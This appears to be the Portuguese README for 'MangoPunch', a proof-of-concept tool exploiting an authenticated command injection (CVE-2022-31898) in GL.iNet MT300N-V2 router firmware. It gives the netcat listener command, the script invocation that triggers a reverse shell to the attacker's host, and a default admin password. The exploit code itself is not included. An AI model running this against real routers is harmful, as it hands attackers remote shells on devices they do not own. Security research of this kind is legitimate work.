
Ferramenta de Injeção de Comando Autenticado (CVE-2022-31898) - HACKCONRD 2026.
__ __ _____ _
| \/ | | __ \ | |
| \ / | __ _ _ __ __ _ ___ | |__) | _ _ __ ___| |__
| |\/| |/ _` | '_ \ / _` |/ _ \| ___/ | | | '_ \ / __| '_ \
| | | | (_| | | | | (_| | (_) | | | |_| | | | | (__| | | |
|_| |_|\__,_|_| |_|\__, |\___/|_| \__,_|_| |_|\___|_| |_|
__/ |
|___/
Este repositório contém uma Prova de Conceito (PoC) técnica para uma vulnerabilidade de Execução Remota de Comandos (RCE) encontrada no GL.iNet MT300N-V2 (Mango) e outros modelos executando versões de firmware inferiores a 3.215.
A falha existe no parâmetro ping_addr da API de diagnóstico, permitindo que um atacante autenticado execute comandos arbitrários do sistema através de metacaracteres de shell (;).
Abra um terminal em sua máquina atacante (Kali Linux) e inicie um listener Netcat:
nc -lvnp 9292
Use o seguinte comando para acionar a reverse shell:
python3 mangopunch.py -R <TARGET_IP> -L <YOUR_IP> -l <YOUR_LISTERNER_PORT> -p <PASSWORD>
| Bandeira | Nome Completo | Descrição | Padrão |
|---|---|---|---|
-R | --rhost | IP do Alvo Remoto (Roteador) | Obrigatório |
-P | --rport | Porta de Gerenciamento Web | 443 |
-L | --lhost | IP do Listener (Kali/Atacante) | Obrigatório |
-l | --lport | Porta do Listener | Obrigatório |
-p | --pwd | Senha do Administrador | goodlife |
-t | --https | Ativar HTTPS | False |
Aviso: Esta ferramenta é apenas para fins educacionais e de teste de segurança autorizados. O autor não é responsável por qualquer uso indevido. MangoPunch: CVE-2022-31898